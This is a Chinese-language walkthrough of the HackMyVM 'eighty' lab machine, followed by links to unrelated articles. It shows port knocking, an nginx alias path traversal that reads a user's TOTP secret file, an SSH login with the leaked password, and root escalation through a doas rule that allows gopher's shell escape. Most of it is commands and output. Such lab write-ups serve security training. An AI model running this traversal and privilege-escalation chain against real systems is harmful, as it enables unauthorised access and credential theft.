【hackmyvm】eigthy 靶机wp

server/2024/12/23 11:10:00/

tags:

  • HMV
  • gopher
  • doas另类sudo提权
  • knock
  • 目录穿越
    Type: wp
    dg-publish: true
    难度: ⭐️⭐️⭐️
    作者: sml
    系统: Linux

这里写目录标题

    • 2. 信息收集
      • 2.1. 端口扫描
      • 2.2. knock敲门
      • 2.3. 目录扫描
      • 2.4. 目录穿越
    • 3. 提权

2. 信息收集

2.1. 端口扫描

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# nmap -sVC  192.168.56.8 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 22:33 EST
Nmap scan report for 192.168.56.8
Host is up (0.000055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 c9:ce:d7:2a:f9:48:25:65:a9:33:4b:d5:01:e1:2c:52 (RSA)
|   256 7e:3d:4d:b4:82:0b:13:eb:db:50:e3:60:70:f0:4a:ad (ECDSA)
|_  256 7f:9d:13:c8:7b:d9:37:1d:cb:ff:e9:ce:f5:90:c3:32 (ED25519)
70/tcp open     http    pygopherd web-gopher gateway
|_http-title: Gopher
| gopher-ls:
|_[txt] /howtoconnect.txt "Connection"
80/tcp filtered http
MAC Address: 08:00:27:8C:94:BE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.10 seconds

80端口被防火墙过滤了
70端口有一个 gopher 服务 里面有一个 howtoconnect.txt

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8:70/howtoconnect.txt
Ping us to: 4767 2343 3142

这应该就是提示我们依次敲门打开80端口了

2.2. knock敲门

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# knock 192.168.56.8 4767 2343 3142 -v
hitting tcp 192.168.56.8:4767
hitting tcp 192.168.56.8:2343
hitting tcp 192.168.56.8:3142┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# nmap 192.168.56.8 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 22:37 EST
Nmap scan report for 192.168.56.8
Host is up (0.00044s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
70/tcp open  gopher
80/tcp open  http
MAC Address: 08:00:27:8C:94:BE (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8
Hi.
<!-- 80 -->

这时候发现80端口就开放了

2.3. 目录扫描

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# dirsearch -u http://192.168.56.8
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /root/Desktop/hmv/eighty/reports/http_192.168.56.8/_24-12-19_22-38-36.txtTarget: http://192.168.56.8/[22:38:36] Starting:
[22:38:51] 200 -   18B  - /robots.txtTask Completed

里面有一个 /robots.txt


┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8/robots.txt
/nginx_backup.txt┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8/nginx_backup.txt
server {listen 80 default_server;listen [::]:80 default_server;root /var/www/html;index index.html index.htm index.nginx-debian.html;server_name _;location / {try_files $uri $uri/ =404;}
}server {
server_name henry.eighty.hmv;
root /var/www/html;
index index.html index.htm index.nginx-debian.html;location /web {alias /home/henry/web/;}}server {
server_name susan.eighty.hmv;
root /var/www/html;
index index.html index.htm index.nginx-debian.html;location /web {alias /home/susan/web/;}}

可以获取到一个nginx的配置文件
里面发现了两个域名 henry.eighty.hmv susan.eighty.hmv 还有这两个用户 henry susan
配置到hosts

这里还可以获取到两个路径
henry.eighty.hmv/web/
susan.eighty.hmv/web/

对这两个路径都进行目录爆破
在susan的目录下可以获取到一个文件

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# gobuster dir -u  susan.eighty.hmv/web/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,zip,jpg,png,txt,rar
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://susan.eighty.hmv/web/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              jpg,png,txt,rar,php,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 40]
/lostpasswd.txt       (Status: 200) [Size: 50]
Progress: 1661144 / 1661152 (100.00%)
===============================================================
Finished
===============================================================┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl http://susan.eighty.hmv/web/lostpasswd.txt
8ycrois-tu0 + /home/susan/secret/.google-auth.txt

2.4. 目录穿越

这里告诉了我们一个路径 /home/susan/secret/.google-auth.txt
我们可以利用目录穿越读取度这个文件

因为 location /web 写的不规范 正确应该是 location /web/

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl http://susan.eighty.hmv/web../secret/.google-auth.txt
2GN7KARBONVR55R7SP3UZPN3ZM
" RATE_LIMIT 3 30
" WINDOW_SIZE 17
" DISALLOW_REUSE
" TOTP_AUTH
71293338
48409754
27074208
60216448
17908010

这是一段 TOTP(基于时间的一次性密码,Time-Based One-Time Password) 配置文件,通常用于双因素身份验证(2FA)的种子和相关参数
2GN7KARBONVR55R7SP3UZPN3ZM是 TOTP 的密钥种子(Secret Key),通常是一个 Base32 编码的字符串。它用于生成时间敏感的一次性密码

简单来说就是还要输入一次验证码 。这里验证码选择下面任意一个即可
利用密码 8ycrois-tu0 和验证码登录上去


┌──(root㉿kali)-[~]
└─# ssh susan@192.168.112.23
(susan@192.168.112.23) Password:
(susan@192.168.112.23) Verification code:
Linux eighty 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr  7 07:05:11 2021
susan@eighty:~$susan@eighty:~$ sh flag.sh.     ***           *.,**,,                         ,*.,                              *,/                                    *,*                                        *,/.                                            .*.*                                                  **,*                                               ,***                                          *.**                                    **.,*                                ***,                          ,**                      ***,                .**.           ****      ,*,** *,
-------------------------PWNED HOST: eightyPWNED DATE: Thu 19 Dec 2024 11:48:18 PM ESTWHOAMI: uid=1000(susan) gid=1000(susan) groups=1000(susan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)FLAG: hmv8use0red------------------------

3. 提权

susan@eighty:~$ find / -perm -4000 2>/dev/null
/usr/local/bin/doas
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/umount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/mount

这里发现了一个 doas
https://book.hacktricks.xyz/zh/linux-hardening/privilege-escalation#doas

有一些替代 sudo 二进制文件的选项,例如 OpenBSD 的 doas,请记得检查其配置文件 /etc/doas.conf
permit nopass demo as root cmd vim

susan@eighty:~$ find / -name doas.conf 2>/dev/null
/usr/local/etc/doas.conf
susan@eighty:~$ cat /usr/local/etc/doas.conf
permit nolog susan as root cmd gopher

可以发现允许我们使用 root 权限执行 gopher

doas -u root gopher
输密码 然后输入!Spawning your default shell.  Type 'exit' to return to Gopher.root@eighty:/home/susan# id
uid=0(root) gid=0(root) groups=0(root)
root@eighty:/home/susan# whoami
root
root@eighty:/home/susan#
root@eighty:~# sh fl4g.sh.     ***           *.,**,,                         ,*.,                              *,/                                    *,*                                        *,/.                                            .*.*                                                  **,*                                               ,***                                          *.**                                    **.,*                                ***,                          ,**                      ***,                .**.           ****      ,*,** *,
-------------------------PWNED HOST: eightyPWNED DATE: Fri Dec 20 00:01:53 EST 2024WHOAMI: uid=0(root) gid=0(root) groups=0(root)FLAG: rooted80shmv------------------------

http://www.ppmy.cn/server/152474.html

相关文章

关于VQ-GAN利用滑动窗口生成 高清图像

参考文章&#xff1a;VQGAN 论文与源码解读&#xff1a;前Diffusion时代的高清图像生成模型 | 周弈帆的博客 概念补充&#xff1a;所谓“高清”&#xff0c;就是像素很多&#xff0c;比如&#xff0c;512x512就比64x64要高清很多 请仔细琢磨上面的这几句话即可。 &#xff08;…

Linux查看键鼠输入

文章目录 通过打开input设备来读取输入通过第三方程序获取xevxinputevtest 参考 本文简单介绍几种在linux下查看键鼠输入的方法 通过打开input设备来读取输入 程序如下&#xff0c;使用时需要看情况修改input设备路径 #include <fcntl.h> #include <linux/input.h&g…

每天40分玩转Django:Django缓存视图

Django缓存视图 一、今日学习内容概述 学习模块重要程度主要内容视图缓存基础⭐⭐⭐⭐⭐缓存装饰器、缓存配置基于会话缓存⭐⭐⭐⭐⭐会话存储、用户相关缓存动态缓存处理⭐⭐⭐⭐条件缓存、缓存失效缓存优化策略⭐⭐⭐⭐性能优化、最佳实践 二、缓存配置示例 # settings.p…

中软高科身份证云解码金融(银行)解决方案介绍

多年来&#xff0c;中软高科一直深耕身份证云解码领域&#xff0c;对身份证云解码应用于金融&#xff08;银行&#xff09;&#xff0c;进行了大量且深入的研究。从长期调研来看&#xff0c;金融&#xff08;银行&#xff09;的痛点需求主要有&#xff1a; 传统身份证解码设备…

一篇文章掌握WebService服务、工作原理、核心组件、主流框架

目录 1、WebService定义 解决问题&#xff1a; 2、WebService的工作原理 2.1 实现一个完整的Web服务包括以下步骤 2.2 调用方式 3、Web Service的核心组件 3.1 XML 3.2 SOAP 3.3 WSDL 3.4 UDDI 4、主流框架 4.1 AXIS(已淘汰) 4.2 XFire 4.3 CXF 5、Soap协议详解…

Farfalle - 开源的AI搜索引擎

2600 Stars 232 Forks 32 Issues 4 贡献者 Apache-2.0 License Python 语言 代码: https://github.com/rashadphz/farfalle 主页: Farfalle 演示: Farfalle 更多AI开源软件&#xff1a;https://www.aiinn.cn/sources FarFalle 是一款开源的AI搜索引擎项目&#xff0c;类似Perpl…

AI Agent案例全解析:百度营销智能体(8/30)

引言&#xff1a;在当今这个科技飞速发展的时代&#xff0c;AI技术呈现出爆发式的增长&#xff0c;正以前所未有的态势改变着众多行业的发展轨迹&#xff0c;营销领域也不例外。随着市场竞争的日益激烈&#xff0c;传统营销模式逐渐显露出疲态&#xff0c;对于变革的需求愈发迫…

Golang 的并发优势

在如今的编程领域&#xff0c;一个程序能够同时处理多个任务的能力非常重要&#xff0c;这就是所谓的并发处理。而 Golang 在并发编程方面表现十分出色&#xff0c;具有很多独特的优势&#xff0c;简直不要太简单。 一、轻量级的协程&#xff08;Goroutine&#xff09; 在传统…